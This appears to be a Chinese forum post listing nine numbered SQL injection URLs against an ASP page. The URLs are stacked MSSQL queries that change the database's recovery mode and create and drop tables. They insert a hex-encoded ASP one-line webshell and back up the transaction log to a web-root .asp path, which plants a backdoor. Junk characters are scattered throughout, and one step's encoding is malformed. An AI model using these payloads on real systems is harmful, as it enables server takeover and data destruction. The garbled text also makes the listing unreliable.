第一步, D. A. F2 u/ t0 ~: [0 q, e
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
: q# C# D! y5 y' Q* M2 R2 k% H6 o+ u% Q( q% }0 k9 ?
第二步:
6 I; q8 y7 \% z& \5 w" j& Vhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 o, k0 T1 P9 P2 J; G5 ?0 j4 c0 g% ]. Z) I
第三步% `& a3 O6 i/ z0 a: T/ X% ~/ i- R" M" x, J
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
6 S0 C- t2 m- c7 @! F" U* n; @2 W& ?/ r+ o
第四步
7 s$ w/ V" ]$ K$ e7 y+ E ahttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
- s% @/ a% p2 c$ h2 t) N( {8 M+ h+ _( ?6 c' x$ l& ]+ |# h0 J
第五步
% z9 y3 X, m( nhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--. ?3 S5 K1 X+ M
1 v0 [; i4 r" b+ J/ C第六步& D1 o! w$ G; g0 A7 H& e
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
" [4 G: e" U+ I# U. Y0 N$ Y/ n0 V: S- F( K0 t: ?) J
第七步
! q2 a. P+ `8 } @1 A) @1 Bhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
4 G8 U% o- s: i/ z* X- ]' B6 H3 @; ]* Z
第八步
) Y$ a8 N2 b, \ _http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--! x% t+ U& I9 V |8 F y
+ H1 K; \7 W# T" S8 d
第九步1 P1 o: O9 n" w) [4 m; v( |
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
5 h2 M2 a7 l: h |